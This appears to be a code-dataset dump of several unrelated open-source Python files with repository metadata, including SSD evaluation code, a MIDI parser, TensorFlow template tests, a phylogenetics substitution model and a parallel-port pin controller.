stream_url = update_scheme(self.url, self.stream_schema.validate(res.text))
return HLSStream.parse_variant_playlist(self.session,
stream_url,
headers={"User-Agent": useragents.CHROME})
__plugin__ = CDNBG
| 36.402985
| 103
| 0.574006
|
794afdb6eb0640f6ad750056f9a489a6c2768e03
| 140
|
py
|
Python
|
tutorial/06_RangeImages/02_range_image_border_extraction.py
|
maguangyan/pclpy_tutorial
|
9ce54d1f1a70cf379b5954ad4d8bed3210e06a4c
|
[
"BSD-3-Clause"
] | 17
|
2021-10-04T08:00:50.000Z
|
2022-03-31T07:23:52.000Z
|
tutorial/06_RangeImages/02_range_image_border_extraction.py
|
maguangyan/pclpy_tutorial
|
9ce54d1f1a70cf379b5954ad4d8bed3210e06a4c
|
[
"BSD-3-Clause"
] | 3
|
2021-12-17T07:42:04.000Z
|
2022-03-30T02:17:15.000Z
|
tutorial/06_RangeImages/02_range_image_border_extraction.py
|
maguangyan/pclpy_tutorial
|
9ce54d1f1a70cf379b5954ad4d8bed3210e06a4c
|
[
"BSD-3-Clause"
] | 2
|
2022-03-18T07:19:19.000Z
|
2022-03-29T14:25:01.000Z
|
# -*- coding: utf-8 -*-
# @Time : DATE:2021/9/23
# @Author : yan
# @Email : 1792659158@qq.com
# @File : 02_range_image_border_extraction.py
| 23.333333
| 45
| 0.657143
|
794afdf53ce9f987102f1f752ac0355d9fef0985
| 5,451
|
py
|
Python
|
neodroidvision/detection/single_stage/ssd/ssd_evaluation.py
|
aivclab/vision
|
6c644dd72f68bca608a2900e5d9461e90fe841eb
|
[
"Apache-2.0"
] | 1
|
2019-07-03T04:33:51.000Z
|
2019-07-03T04:33:51.000Z
|
neodroidvision/detection/single_stage/ssd/ssd_evaluation.py
|
aivclab/vision
|
6c644dd72f68bca608a2900e5d9461e90fe841eb
|
[
"Apache-2.0"
] | 5
|
2019-07-03T04:38:07.000Z
|
2021-09-10T15:40:44.000Z
|
neodroidvision/detection/single_stage/ssd/ssd_evaluation.py
|
aivclab/vision
|
6c644dd72f68bca608a2900e5d9461e90fe841eb
|
[
"Apache-2.0"
] | 3
|
2019-10-03T06:14:40.000Z
|
2021-01-31T14:31:39.000Z
|
import logging
import torch
import torch.utils.data
from pathlib import Path
from torch.nn import Module
from torch.utils.data import DataLoader
from tqdm import tqdm
from typing import Any, List
from warg import NOD
from neodroidvision import PROJECT_APP_PATH
from neodroidvision.data.detection.coco import COCODataset, coco_evaluation
from neodroidvision.data.detection.voc import VOCDataset, voc_evaluation
from neodroidvision.detection.single_stage.ssd.object_detection_dataloader import (
object_detection_data_loaders,
)
from neodroidvision.utilities import (
distributing_utilities,
is_main_process,
synchronise_torch_barrier,
)
__all__ = ["do_ssd_evaluation"]
from draugr.numpy_utilities import Split
def compute_on_dataset(
model: Module,
data_loader: DataLoader,
device: torch.device,
cpu_device=torch.device("cpu"),
) -> dict:
"""
Args:
model:
data_loader:
device:
cpu_device:
Returns:
"""
results_dict = {}
for batch in tqdm(data_loader):
images, targets, image_ids = batch
with torch.no_grad():
results_dict.update(
{
img_id: result
for img_id, result in zip(
image_ids, [o.to(cpu_device) for o in model(images.to(device))]
)
}
)
return results_dict
def accumulate_predictions_from_cuda_devices(predictions_per_gpu: Any) -> list:
"""
:param predictions_per_gpu:
:return:"""
all_predictions = distributing_utilities.all_gather_cuda(predictions_per_gpu)
if not distributing_utilities.is_main_process():
return
predictions = {}
for p in all_predictions: # merge the list of dicts
predictions.update(p)
image_ids = list(
sorted(predictions.keys())
) # convert a dict where the key is the index in a list
if len(image_ids) != image_ids[-1] + 1:
logger = logging.getLogger("SSD.inference")
logger.warning(
"Number of images that were gathered from multiple processes is not a contiguous set. Some "
"images "
"might be missing from the evaluation"
)
return [predictions[i] for i in image_ids]
def evaluate_dataset(dataset, predictions, output_dir: Path, **kwargs) -> dict:
"""evaluate dataset using different methods based on dataset type.
Args:
dataset: Dataset object
predictions(list[(boxes, labels, scores)]): Each item in the list represents the
prediction results for one image. And the index should match the dataset index.
output_dir: output folder, to save evaluation files or results.
Returns:
evaluation result"""
kws = dict(
dataset=dataset, predictions=predictions, output_dir=output_dir, **kwargs
)
if isinstance(dataset, VOCDataset):
return voc_evaluation(**kws)
elif isinstance(dataset, COCODataset):
return coco_evaluation(**kws)
else:
raise NotImplementedError
def inference_ssd(
*,
model: Module,
data_loader: DataLoader,
dataset_name: str,
device: torch.device,
output_folder: Path = None,
use_cached: bool = False,
**kwargs,
) -> dict:
"""
:param model:
:param data_loader:
:param dataset_name:
:param device:
:param output_folder:
:param use_cached:
:param kwargs:
:return:"""
dataset = data_loader.dataset
logger = logging.getLogger("SSD.inference")
logger.info(f"Evaluating {dataset_name} dataset({len(dataset)} images):")
predictions_path = output_folder / "predictions.pth"
if use_cached and predictions_path.exists():
predictions = torch.load(predictions_path, map_location="cpu")
else:
predictions = compute_on_dataset(model, data_loader, device)
synchronise_torch_barrier()
predictions = accumulate_predictions_from_cuda_devices(predictions)
if not is_main_process():
return
if output_folder:
torch.save(predictions, predictions_path)
return evaluate_dataset(
dataset=dataset, predictions=predictions, output_dir=output_folder, **kwargs
)
@torch.no_grad()
def do_ssd_evaluation(
data_root: Path, cfg: NOD, model: Module, distributed: bool, **kwargs) -> List:
"""
Args:
:param data_root:
:param cfg:
:param model:
:param distributed:
:param kwargs:
:return:"""
if isinstance(model, torch.nn.parallel.DistributedDataParallel):
model = model.module
model.eval()
device = torch.device(cfg.MODEL.DEVICE)
eval_results = []
for dataset_name, data_loader in zip(
cfg.DATASETS.TEST,
object_detection_data_loaders(
data_root=data_root,
cfg=cfg,
split=Split.Validation,
distributed=distributed,
),
):
eval_results.append(
inference_ssd(
model=model,
data_loader=data_loader,
dataset_name=dataset_name,
device=device,
output_folder=PROJECT_APP_PATH.user_data
/ "results"
/ "inference"
/ dataset_name,
**kwargs,
)
)
return eval_results
| 28.097938
| 104
| 0.63548
|
794afe494d648a6c55c1ccd2785e3255ed6cc45f
| 716
|
py
|
Python
|
playground/segmentation/coco/tensormask/tensormask.res50.fpn.coco.800size.1x/net.py
|
reinforcementdriving/cvpods
|
32d98b74745020be035a0e20337ad934201615c4
|
[
"Apache-2.0"
] | 1
|
2021-04-24T17:01:29.000Z
|
2021-04-24T17:01:29.000Z
|
playground/segmentation/coco/tensormask/tensormask.res50.fpn.coco.800size.1x/net.py
|
wondervictor/cvpods
|
614a975e5425bbaeb66bbd1ffca552d633ba89ca
|
[
"Apache-2.0"
] | null | null | null |
playground/segmentation/coco/tensormask/tensormask.res50.fpn.coco.800size.1x/net.py
|
wondervictor/cvpods
|
614a975e5425bbaeb66bbd1ffca552d633ba89ca
|
[
"Apache-2.0"
] | null | null | null |
from cvpods.layers import ShapeSpec
from cvpods.modeling.meta_arch import TensorMask
from cvpods.modeling.backbone import Backbone
from cvpods.modeling.backbone.fpn import build_retinanet_resnet_fpn_backbone
def build_backbone(cfg, input_shape=None):
"""
Build a backbone from `cfg.MODEL.BACKBONE.NAME`.
Returns:
an instance of :class:`Backbone`
"""
if input_shape is None:
input_shape = ShapeSpec(channels=len(cfg.MODEL.PIXEL_MEAN))
backbone = build_retinanet_resnet_fpn_backbone(cfg, input_shape)
assert isinstance(backbone, Backbone)
return backbone
def build_model(cfg):
cfg.build_backbone = build_backbone
model = TensorMask(cfg)
return model
| 25.571429
| 76
| 0.75
|
794afe84ebbcdfbc5c1fcc7d863e2b103a1eab7c
| 6,644
|
py
|
Python
|
src/midi/MidiFileParser.py
|
Adilmar/DancePython
|
846a4abc9ef1969da2e84e985b834abcf5db03c0
|
[
"BSD-3-Clause"
] | null | null | null |
src/midi/MidiFileParser.py
|
Adilmar/DancePython
|
846a4abc9ef1969da2e84e985b834abcf5db03c0
|
[
"BSD-3-Clause"
] | null | null | null |
src/midi/MidiFileParser.py
|
Adilmar/DancePython
|
846a4abc9ef1969da2e84e985b834abcf5db03c0
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: ISO-8859-1 -*-
# std library
from struct import unpack
# uhh I don't really like this, but there are so many constants to
# import otherwise
from constants import *
from EventDispatcher import EventDispatcher
class MidiFileParser:
"""
The MidiFileParser is the lowest level parser that see the data as
midi data. It generates events that gets triggered on the outstream.
"""
def __init__(self, raw_in, outstream):
"""
raw_data is the raw content of a midi file as a string.
"""
# internal values, don't mess with 'em directly
self.raw_in = raw_in
self.dispatch = EventDispatcher(outstream)
# Used to keep track of stuff
self._running_status = None
def parseMThdChunk(self):
"Parses the header chunk"
raw_in = self.raw_in
header_chunk_type = raw_in.nextSlice(4)
header_chunk_zise = raw_in.readBew(4)
# check if it is a proper midi file
if header_chunk_type != 'MThd':
raise TypeError, "It is not a valid midi file!"
# Header values are at fixed locations, so no reason to be clever
self.format = raw_in.readBew(2)
self.nTracks = raw_in.readBew(2)
self.division = raw_in.readBew(2)
# Theoretically a header larger than 6 bytes can exist
# but no one has seen one in the wild
# But correctly ignore unknown data if it is though
if header_chunk_zise > 6:
raw_in.moveCursor(header_chunk_zise-6)
# call the header event handler on the stream
self.dispatch.header(self.format, self.nTracks, self.division)
def parseMTrkChunk(self):
"Parses a track chunk. This is the most important part of the parser."
# set time to 0 at start of a track
self.dispatch.reset_time()
dispatch = self.dispatch
raw_in = self.raw_in
# Trigger event at the start of a track
dispatch.start_of_track(self._current_track)
# position cursor after track header
raw_in.moveCursor(4)
# unsigned long is 4 bytes
tracklength = raw_in.readBew(4)
track_endposition = raw_in.getCursor() + tracklength # absolute position!
while raw_in.getCursor() < track_endposition:
# find relative time of the event
time = raw_in.readVarLen()
dispatch.update_time(time)
# be aware of running status!!!!
peak_ahead = raw_in.readBew(move_cursor=0)
if (peak_ahead & 0x80):
# the status byte has the high bit set, so it
# was not running data but proper status byte
status = raw_in.readBew()
if not peak_ahead in [META_EVENT, SYSTEM_EXCLUSIVE]:
self._running_status = status
else:
# use that darn running status
status = self._running_status
# could it be illegal data ?? Do we need to test for that?
# I need more example midi files to be shure.
# Also, while I am almost certain that no realtime
# messages will pop up in a midi file, I might need to
# change my mind later.
# we need to look at nibbles here
hi_nible, lo_nible = status & 0xF0, status & 0x0F
# match up with events
# Is it a meta_event ??
# these only exists in midi files, not in transmitted midi data
# In transmitted data META_EVENT (0xFF) is a system reset
if status == META_EVENT:
meta_type = raw_in.readBew()
meta_length = raw_in.readVarLen()
meta_data = raw_in.nextSlice(meta_length)
if not meta_length: return
dispatch.meta_event(meta_type, meta_data)
if meta_type == END_OF_TRACK: return
# Is it a sysex_event ??
elif status == SYSTEM_EXCLUSIVE:
# ignore sysex events
sysex_length = raw_in.readVarLen()
# don't read sysex terminator
sysex_data = raw_in.nextSlice(sysex_length-1)
# only read last data byte if it is a sysex terminator
# It should allways be there, but better safe than sorry
if raw_in.readBew(move_cursor=0) == END_OFF_EXCLUSIVE:
eo_sysex = raw_in.readBew()
dispatch.sysex_event(sysex_data)
# the sysex code has not been properly tested, and might be fishy!
# is it a system common event?
elif hi_nible == 0xF0: # Hi bits are set then
data_sizes = {
MTC:1,
SONG_POSITION_POINTER:2,
SONG_SELECT:1,
}
data_size = data_sizes.get(hi_nible, 0)
common_data = raw_in.nextSlice(data_size)
common_type = lo_nible
dispatch.system_common(common_type, common_data)
# Oh! Then it must be a midi event (channel voice message)
else:
data_sizes = {
PATCH_CHANGE:1,
CHANNEL_PRESSURE:1,
NOTE_OFF:2,
NOTE_ON:2,
AFTERTOUCH:2,
CONTINUOUS_CONTROLLER:2,
PITCH_BEND:2,
}
data_size = data_sizes.get(hi_nible, 0)
channel_data = raw_in.nextSlice(data_size)
event_type, channel = hi_nible, lo_nible
dispatch.channel_messages(event_type, channel, channel_data)
def parseMTrkChunks(self):
"Parses all track chunks."
for t in range(self.nTracks):
self._current_track = t
self.parseMTrkChunk() # this is where it's at!
self.dispatch.eof()
if __name__ == '__main__':
import sys
# get data
test_file = 'test/midifiles/minimal.mid'
test_file = 'test/midifiles/cubase-minimal.mid'
test_file = 'test/midifiles/Lola.mid'
test_file = sys.argv[1]
# f = open(test_file, 'rb')
# raw_data = f.read()
# f.close()
#
#
# # do parsing
from MidiToText import MidiToText
from RawInstreamFile import RawInstreamFile
midi_in = MidiFileParser(RawInstreamFile(test_file), MidiToText())
midi_in.parseMThdChunk()
midi_in.parseMTrkChunks()
| 33.22
| 82
| 0.573299
|
794affc090c98441b5096c9e3a8adadef160e581
| 74
|
py
|
Python
|
ner_anonymizer/__init__.py
|
kelvnt/DataAnonymizer
|
0d81972b4e4521a4db746ddd8788bf98087a48d2
|
[
"MIT"
] | 2
|
2020-09-07T13:34:30.000Z
|
2020-09-07T13:35:52.000Z
|
ner_anonymizer/__init__.py
|
kelvnt/DataAnonymizer
|
0d81972b4e4521a4db746ddd8788bf98087a48d2
|
[
"MIT"
] | 1
|
2021-06-30T06:27:34.000Z
|
2021-06-30T08:24:25.000Z
|
ner_anonymizer/__init__.py
|
kelvnt/ner-anonymizer
|
de8df3186cbae5efc316887f40f12e14e0d0e298
|
[
"MIT"
] | null | null | null |
from .ner_anonymizer import (
DataAnonymizer,
de_anonymize_data
)
| 14.8
| 29
| 0.743243
|
794b012749a8a7eb9768b6bd7e210d9249de03ea
| 6,997
|
py
|
Python
|
tensorflow/python/kernel_tests/template_test.py
|
matsuyama/tensorflow
|
a27d844e05447e65aa279ae5269a2d75590f46f6
|
[
"Apache-2.0"
] | 23
|
2016-02-04T21:08:43.000Z
|
2022-01-14T13:22:33.000Z
|
tensorflow/python/kernel_tests/template_test.py
|
matsuyama/tensorflow
|
a27d844e05447e65aa279ae5269a2d75590f46f6
|
[
"Apache-2.0"
] | 2
|
2016-05-31T16:38:55.000Z
|
2018-12-30T20:17:05.000Z
|
tensorflow/python/kernel_tests/template_test.py
|
matsuyama/tensorflow
|
a27d844e05447e65aa279ae5269a2d75590f46f6
|
[
"Apache-2.0"
] | 20
|
2016-02-15T17:31:02.000Z
|
2020-01-12T08:18:48.000Z
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for make_template."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import traceback
import tensorflow.python.platform
import tensorflow as tf
from tensorflow.python.ops import template
def var_scoped_function():
return tf.get_variable("dummy",
shape=[1],
initializer=tf.zeros_initializer)
def internally_var_scoped_function(scope_name):
with tf.variable_scope(scope_name):
return tf.get_variable("dummy",
shape=[1],
initializer=tf.zeros_initializer)
def function_with_create(trainable):
"""Creates a variable as a side effect using tf.Variable."""
tf.Variable(0, trainable=trainable)
return tf.get_variable("dummy",
shape=[1],
initializer=tf.zeros_initializer)
class TemplateTest(tf.test.TestCase):
def test_end_to_end(self):
"""This test shows a very simple line model with test_loss.
The template is used to share parameters between a training and test model.
"""
# y = 2x + 1
training_input, training_output = ([1., 2., 3., 4.], [2.8, 5.1, 7.2, 8.7])
test_input, test_output = ([5., 6., 7., 8.], [11, 13, 15, 17])
tf.set_random_seed(1234)
def test_line(x):
m = tf.get_variable("w", shape=[],
initializer=tf.truncated_normal_initializer())
b = tf.get_variable("b", shape=[],
initializer=tf.truncated_normal_initializer())
return x * m + b
line_template = template.make_template("line", test_line)
train_prediction = line_template(training_input)
test_prediction = line_template(test_input)
train_loss = tf.reduce_mean(tf.square(train_prediction - training_output))
test_loss = tf.reduce_mean(tf.square(test_prediction - test_output))
optimizer = tf.train.GradientDescentOptimizer(0.1)
train_op = optimizer.minimize(train_loss)
with tf.Session() as sess:
sess.run(tf.initialize_all_variables())
initial_test_loss = sess.run(test_loss)
sess.run(train_op)
final_test_loss = sess.run(test_loss)
# Parameters are tied, so the loss should have gone down when we trained it.
self.assertLess(final_test_loss, initial_test_loss)
def test_skip_stack_frames(self):
first = traceback.format_stack()
second = traceback.format_stack()
result = template._skip_common_stack_elements(first, second)
self.assertEqual(1, len(result))
self.assertNotEqual(len(first), len(result))
def test_template_with_name(self):
tmpl1 = template.make_template("s1", var_scoped_function)
tmpl2 = template.make_template("s1", var_scoped_function)
v1 = tmpl1()
v2 = tmpl1()
v3 = tmpl2()
self.assertEqual(v1, v2)
self.assertNotEqual(v1, v3)
self.assertEqual("s1/dummy:0", v1.name)
self.assertEqual("s1_2/dummy:0", v3.name)
def test_template_in_scope(self):
tmpl1 = template.make_template("s1", var_scoped_function)
tmpl2 = template.make_template("s1", var_scoped_function)
with tf.variable_scope("scope"):
v1 = tmpl1()
v3 = tmpl2()
# The template contract requires the following to ignore scope2.
with tf.variable_scope("scope2"):
v2 = tmpl1()
self.assertEqual(v1, v2)
self.assertNotEqual(v1, v3)
self.assertEqual("scope/s1/dummy:0", v1.name)
self.assertEqual("scope/s1_1/dummy:0", v3.name)
def test_template_with_internal_reuse(self):
tmpl1 = template.make_template("s1", internally_var_scoped_function)
tmpl2 = template.make_template("s1", internally_var_scoped_function)
v1 = tmpl1("test")
v2 = tmpl1("test")
v3 = tmpl2("test")
self.assertEqual(v1, v2)
self.assertNotEqual(v1, v3)
self.assertEqual("s1/test/dummy:0", v1.name)
self.assertEqual("s1_2/test/dummy:0", v3.name)
with self.assertRaises(ValueError):
tmpl1("not_test")
def test_template_without_name(self):
with self.assertRaises(ValueError):
template.make_template(None, var_scoped_function)
def test_make_template(self):
# Test both that we can call it with positional and keywords.
tmpl1 = template.make_template(
"s1", internally_var_scoped_function, scope_name="test")
tmpl2 = template.make_template(
"s1", internally_var_scoped_function, scope_name="test")
v1 = tmpl1()
v2 = tmpl1()
v3 = tmpl2()
self.assertEqual(v1, v2)
self.assertNotEqual(v1, v3)
self.assertEqual("s1/test/dummy:0", v1.name)
self.assertEqual("s1_2/test/dummy:0", v3.name)
def test_enforces_no_extra_trainable_variables(self):
tmpl = template.make_template("s", function_with_create, trainable=True)
tmpl()
with self.assertRaises(ValueError):
tmpl()
def test_permits_extra_non_trainable_variables(self):
tmpl = template.make_template("s", function_with_create, trainable=False)
self.assertEqual(tmpl(), tmpl())
def test_internal_variable_reuse(self):
def nested():
with tf.variable_scope("nested") as vs:
v1 = tf.get_variable("x", initializer=tf.zeros_initializer, shape=[])
with tf.variable_scope(vs, reuse=True):
v2 = tf.get_variable("x")
self.assertEqual(v1, v2)
return v1
tmpl1 = template.make_template("s1", nested)
tmpl2 = template.make_template("s1", nested)
v1 = tmpl1()
v2 = tmpl1()
v3 = tmpl2()
self.assertEqual(v1, v2)
self.assertNotEqual(v1, v3)
self.assertEqual("s1/nested/x:0", v1.name)
self.assertEqual("s1_2/nested/x:0", v3.name)
def test_nested_templates(self):
def nested_template():
nested1 = template.make_template("nested", var_scoped_function)
nested2 = template.make_template("nested", var_scoped_function)
v1 = nested1()
v2 = nested2()
self.assertNotEqual(v1, v2)
return v2
tmpl1 = template.make_template("s1", nested_template)
tmpl2 = template.make_template("s1", nested_template)
v1 = tmpl1()
v2 = tmpl1()
v3 = tmpl2()
self.assertEqual(v1, v2)
self.assertNotEqual(v1, v3)
self.assertEqual("s1/nested_1/dummy:0", v1.name)
self.assertEqual("s1_2/nested_1/dummy:0", v3.name)
if __name__ == "__main__":
tf.test.main()
| 32.696262
| 80
| 0.677719
|
794b019e71623e77a66a2bf0253968dc7aa0dabc
| 2,452
|
py
|
Python
|
beastling/models/binaryctmc.py
|
tresoldi/BEASTling
|
9deaf8a18bfd5516169a124ac439d3bfa0eab506
|
[
"BSD-2-Clause"
] | 12
|
2015-10-30T09:25:09.000Z
|
2021-12-09T17:06:50.000Z
|
beastling/models/binaryctmc.py
|
tresoldi/BEASTling
|
9deaf8a18bfd5516169a124ac439d3bfa0eab506
|
[
"BSD-2-Clause"
] | 254
|
2015-11-03T10:37:05.000Z
|
2021-07-23T19:57:35.000Z
|
beastling/models/binaryctmc.py
|
tresoldi/BEASTling
|
9deaf8a18bfd5516169a124ac439d3bfa0eab506
|
[
"BSD-2-Clause"
] | 9
|
2015-11-02T09:57:31.000Z
|
2021-05-12T00:48:03.000Z
|
from .binary import BinaryModelWithShareParams as BinaryModel
from beastling.util import xml
class BinaryCTMCModel(BinaryModel):
def __init__(self, model_config, global_config):
BinaryModel.__init__(self, model_config, global_config)
self.subst_model_id = None
def get_userdatatype(self, feature, fname):
if not self.beastxml._binary_userdatatype_created:
self.beastxml._binary_userdatatype_created = True
return xml.userDataType(None, id="BinaryDatatype", spec="beast.evolution.datatype.Binary")
return xml.userDataType(None, idref="BinaryDatatype")
def add_substmodel(self, sitemodel, feature, fname):
# If we're sharing one substmodel across all features and have already
# created it, just reference it and that's it
if self.subst_model_id:
sitemodel.set("substModel", "@%s" % self.subst_model_id)
return
# Otherwise, create a substmodel
name = self.name if self.share_params else fname
subst_model_id = "binaryCTMC.s:%s" % name
if self.share_params:
self.subst_model_id = subst_model_id
substmodel = xml.substModel(sitemodel, id=subst_model_id, spec="GeneralSubstitutionModel")
xml.parameter(
substmodel,
text="1.0 1.0",
id="rates.s:%s" % name,
dimension=2,
estimate="false",
name="rates")
if self.frequencies == "estimate":
xml.frequencies(
substmodel,
id="estimatedFrequencies.s:%s" % name,
spec="Frequencies",
frequencies="@freqs_param.s:%s" % name)
elif self.frequencies == "empirical":
attribs = {"id": "empiricalFrequencies.s:%s" % name, "spec": "Frequencies"}
if self.share_params:
if self.single_sitemodel:
attribs["data"] = "@filtered_data_%s" % name
else:
attribs["frequencies"] = self.build_freq_str()
else:
attribs["data"] = "@feature_data_%s" % name
xml.frequencies(substmodel, attrib=attribs)
elif self.frequencies == "uniform":
xml.frequencies(
substmodel,
text="0.5 0.5",
id="frequencies.s:%s" % name,
dimension="2",
spec="parameter.RealParameter")
| 40.866667
| 102
| 0.591354
|
794b01c5a93ca8c5fa2e3f04f835820d4d8d2fdf
| 4,005
|
py
|
Python
|
29dec/HaIndusIOcard.py
|
sethiyark/be-project
|
e74f3aae0caa8d4796cb47cdc51547b77d3cb1f1
|
[
"MIT"
] | null | null | null |
29dec/HaIndusIOcard.py
|
sethiyark/be-project
|
e74f3aae0caa8d4796cb47cdc51547b77d3cb1f1
|
[
"MIT"
] | null | null | null |
29dec/HaIndusIOcard.py
|
sethiyark/be-project
|
e74f3aae0caa8d4796cb47cdc51547b77d3cb1f1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# File pportbits.py
# http://www.bristolwatch.com/pport/index.htm
# By Lewis Loflin - lewis@bvu.net
# Example code to turn ON-OFF individual bits on PC
# printer port Db25 pins 2-9.
# Must use my version of pyparallel on website for self.p.getData().
# Bitwise AND is used to clear a bit while bitwise OR used to set bit.
import parallel
import time
class Parallel_ports:
def __init__(self):
self.p = parallel.Parallel()
def clearPin(self,bit_val):
if bit_val == 1:
self.p.setDataStrobe(0) # set databit 0, Pin 1
if bit_val == 2:
self.p.setData(self.p.getData() & (255 - 1)) # set databit 0, Pin 2
if bit_val == 3:
self.p.setData(self.p.getData() & (255 - 2)) # set bit 1, Pin 3
if bit_val == 4:
self.p.setData(self.p.getData() & (255 - 4)) # set bit 3, Pin 4
if bit_val == 5:
self.p.setData(self.p.getData() & (255 - 8)) # set bit 4, Pin 5
if bit_val == 6:
self.p.setData(self.p.getData() & (255 - 16)) # set bit 5, Pin 6
if bit_val == 7:
self.p.setData(self.p.getData()& (255 - 32)) # set bit 6, Pin 7
if bit_val == 8:
self.p.setData(self.p.getData() & (255 - 64)) # set bit 7, Pin 8
if bit_val == 9:
self.p.setData(self.p.getData() & (255 - 128)) # set bit 8, Pin 9
if bit_val == 14:
self.p.setAutoFeed(0) # set , Pin 14
if bit_val == 16:
self.p.setInitOut(0) # set , Pin 16
if bit_val == 17:
self.p.setSelect(0) # set , Pin 17
def setPin(self,bit_val):
if bit_val == 1:
self.p.setDataStrobe(1) # set databit 0, Pin 1
if bit_val == 2:
self.p.setData(self.p.getData() | 1) # set databit 0, Pin 2
if bit_val == 3:
self.p.setData(self.p.getData() | 2) # set bit 1, Pin 3
if bit_val == 4:
self.p.setData(self.p.getData() | 4) # set bit 2, Pin 4
if bit_val == 5:
self.p.setData(self.p.getData() | 8) # set bit 3, Pin 5
if bit_val == 6:
self.p.setData(self.p.getData() | 16) # set bit 4, Pin 6
if bit_val == 7:
self.p.setData(self.p.getData() | 32) # set bit 5, Pin 7
if bit_val == 8:
self.p.setData(self.p.getData() | 64) # set bit 6, Pin 8
if bit_val == 9:
self.p.setData(self.p.getData() | 128) # set bit 7, Pin 9
if bit_val == 14:
self.p.setAutoFeed(1) # set , Pin 14
if bit_val == 16:
self.p.setInitOut(1) # set , Pin 16
if bit_val == 17:
self.p.setSelect(1) # set , Pin 17
def getPin(self,bit_val):
if bit_val == 15:
return self.p.getInError() # Pin15
if bit_val == 13:
return self.p.getInSelected() # Pin13
if bit_val == 12:
return self.p.getInPaperOut() # Pin12
if bit_val == 10:
return self.p.getInAcknowledge() # Pin10
if bit_val == 11:
return self.p.getInBusy() # Pin11
'''
# convert a 8-bit number (integer) to a binary.
# Returns string.
# unlike python bin() this doesn't drop leading zeros
def convBinary(value):
binaryValue = 'b'
for x in range(0, 8):
temp = value & 0x80
if temp == 0x80:
binaryValue = binaryValue + '1'
else:
binaryValue = binaryValue + '0'
value = value << 1
return binaryValue
# Set all data port bits to 0
self.p.setData(0) # LEDs off
print "Port data latches =", self.p.getData()
# read port data latches - should be 0
# use differing combinations
# set bits D0, D1, D2, D3
#__________________________________MAIN_CODE___________________________
for x in range (0,10):
print "Pin value =", getPin(12)
time.sleep(0.5)
# Read and print data port:
xp = self.p.getData()
print "Value of data port =", convBinary(xp), " ", hex(xp)
xp = self.p.PPRSTATUS()
print "Value of control port =", convBinary(xp), " ", hex(xp)
# should be Value of control port = b10000011 0x83
# LEDs connected to port will show 10000011
'''
| 32.298387
| 76
| 0.588514
|
794b03274bbe5f0ad9cd422a9daa76dc00692286
| 1,388
|
py
|
Python
|
bespin/test_backend.py
|
Duke-GCB/bespin-api
|
cea5c20fb2ff592adabe6ebb7ca934939aa11a34
|
[
"MIT"
] | null | null | null |
bespin/test_backend.py
|
Duke-GCB/bespin-api
|
cea5c20fb2ff592adabe6ebb7ca934939aa11a34
|
[
"MIT"
] | 137
|
2016-12-09T18:59:45.000Z
|
2021-06-10T18:55:47.000Z
|
bespin/test_backend.py
|
Duke-GCB/bespin-api
|
cea5c20fb2ff592adabe6ebb7ca934939aa11a34
|
[
"MIT"
] | 3
|
2017-11-14T16:05:58.000Z
|
2018-12-28T18:07:43.000Z
|
from django.test.utils import override_settings
from django.test import TestCase
from unittest.mock import patch
from bespin.backend import BespinOAuth2Backend
class BespinOAuth2BackendTestCase(TestCase):
def setUp(self):
self.details = {'dukeUniqueID': 'abc123'}
@override_settings(REQUIRED_GROUP_MANAGER_GROUP='test-group')
@patch('bespin.backend.BespinOAuth2Backend.verify_user_belongs_to_group')
def test_check_user_details_verifies_required_group(self, mock_verify):
backend = BespinOAuth2Backend()
backend.check_user_details(self.details)
self.assertTrue(mock_verify.called)
self.assertTrue(mock_verify.call_args('abc123','test-group'))
@override_settings(REQUIRED_GROUP_MANAGER_GROUP=None)
@patch('bespin.backend.BespinOAuth2Backend.verify_user_belongs_to_group')
def test_check_user_details_skips_none_group(self, mock_verify):
backend = BespinOAuth2Backend()
backend.check_user_details(self.details)
self.assertFalse(mock_verify.called)
@override_settings(REQUIRED_GROUP_MANAGER_GROUP='')
@patch('bespin.backend.BespinOAuth2Backend.verify_user_belongs_to_group')
def test_check_user_details_skips_emptystring_group(self, mock_verify):
backend = BespinOAuth2Backend()
backend.check_user_details(self.details)
self.assertFalse(mock_verify.called)
| 42.060606
| 77
| 0.778818
|
794b04630f0a967a036d1a62029bdbcb1da914b3
| 1,216
|
py
|
Python
|
model-optimizer/extensions/front/mxnet/softmax_ext.py
|
undeadinu/dldt
|
fbc7a4a710c24def8ab199926a7da90a0394b87d
|
[
"Apache-2.0"
] | 1
|
2019-03-22T06:35:55.000Z
|
2019-03-22T06:35:55.000Z
|
model-optimizer/extensions/front/mxnet/softmax_ext.py
|
undeadinu/dldt
|
fbc7a4a710c24def8ab199926a7da90a0394b87d
|
[
"Apache-2.0"
] | null | null | null |
model-optimizer/extensions/front/mxnet/softmax_ext.py
|
undeadinu/dldt
|
fbc7a4a710c24def8ab199926a7da90a0394b87d
|
[
"Apache-2.0"
] | 1
|
2019-06-11T06:20:42.000Z
|
2019-06-11T06:20:42.000Z
|
"""
Copyright (c) 2018 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from mo.front.mxnet.extractors.utils import get_mxnet_layer_attrs
from mo.front.extractor import FrontExtractorOp
from mo.ops.softmax import Softmax
class SoftmaxFrontExtractor(FrontExtractorOp):
op = 'softmax'
enabled = True
@staticmethod
def extract(node):
attrs = get_mxnet_layer_attrs(node.symbol_dict)
update_attrs = {
'type': 'Softmax',
'axis': attrs.int("axis", -1),
'temperature': attrs.float('temperature', 1.0)
}
# update the attributes of the node
Softmax.update_node_stat(node, update_attrs)
return __class__.enabled
| 31.179487
| 73
| 0.712993
|
794b050a2422a685fa8f209a28414b6b11a20d05
| 2,052
|
py
|
Python
|
keyed_urls/__init__.py
|
matthiask/django-keyed-urls
|
b195ffd24c1c259485744cc0c1b824f4dd867ac0
